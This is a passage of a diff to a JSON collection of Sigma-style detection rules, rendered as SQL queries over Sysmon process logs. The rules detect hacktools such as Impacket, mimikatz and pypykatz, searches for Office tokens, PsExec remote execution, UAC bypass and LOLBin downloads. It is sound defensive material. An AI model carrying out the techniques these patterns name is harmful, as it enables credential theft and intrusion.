commands in .lnk files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' 
ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_susp_embed_exe_lnk.yml" }, { - "title": "Suspicious Extexport Execution", - "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "title": "Suspicious Office Token Search Via CLI", + "id": "6d3a3952-6530-44a3-8554-cf17c116c615", "status": "experimental", - "description": "Extexport.exe loads dll and is execute from other folder the original path", - "author": "frack113", + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_extexport.yml" + "filename": "proc_creation_win_susp_office_token_search.yml" }, { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - 
"description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", + "status": "experimental", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Suspicious Execution of Taskkill", - "id": "86085955-ea48-42a2-9dd3-85d4c36b167d", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", "status": "experimental", - "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", - "author": "frack113", + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Expected FP with some processes using this techniques to terminate one of their processes during installations and updates" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR OriginalFileName = 'taskkill.exe') AND (CommandLine LIKE '% /f%' ESCAPE '\\' AND CommandLine LIKE '% /im %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskkill_execution.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", + "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. 
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", + "title": "Use of Squirrel.exe", + "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. 
This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", + "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1553.004" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR Image LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' 
AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_lolbin_squirrel.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Suspicious RunAs-Like Flag Combination", - "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", + "title": "Computer System Reconnaissance Via Wmic.EXE", + "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", "status": 
"experimental", - "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation" + "attack.discovery", + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" + "filename": "proc_creation_win_wmic_recon_computersystem.yml" }, { - "title": "Potential Product Class Reconnaissance Via Wmic.EXE", - "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", - "status": 
"experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", + "status": "test", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1059", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_product_class.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Password Protected Compressed File Extraction Via 7Zip", - "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", + "title": "Service StartupType Change Via PowerShell Set-Service", + "id": "62b20d44-1546-4e61-afce-8e175eb9473c", "status": "experimental", - "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", + "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", "author": "Nasreddine Bencherchali (Nextron Systems)", 
"tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate activity is expected since extracting files with a password can be common in some environement." + "False positives may occur with troubleshooting scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_7zip_password_extraction.yml" + "filename": "proc_creation_win_powershell_set_service_disabled.yml" }, { - "title": "Monitoring Winget For LOLbin Execution", - "id": "313d6012-51a0-4d93-8dfc-de8553239e25", - "status": "experimental", - "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them without touching disk. The manifest option enables you to install an application by passing in a YAML file directly to the client. 
Winget can be used to download and install exe's, msi, msix files later.", - "author": "Sreeman, Florian Roth (Nextron Systems), Frack113", + "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "blueteamer8699", "tags": [ - "attack.defense_evasion", + "attack.discovery", "attack.execution", - "attack.t1059" + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND CommandLine LIKE '%install%' ESCAPE '\\' AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_execution_via_winget.yml" + "filename": "proc_creation_win_lolbin_gather_network_info.yml" }, { - "title": "Enumeration for Credentials in Registry", - "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", "status": "test", - "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that 
can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", - "author": "frack113", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.002" + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + }, + { + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", + "status": "test", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ "Unknown" ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + }, + { + "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "status": "test", + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks 
against the NTDS database (NTDS.DIT)", + "author": "Thomas Patzke", + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "falsepositives": [ + "NTDS maintenance" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" + "filename": "proc_creation_win_ntdsutil_usage.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", - "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "status": "test", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl 
executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND 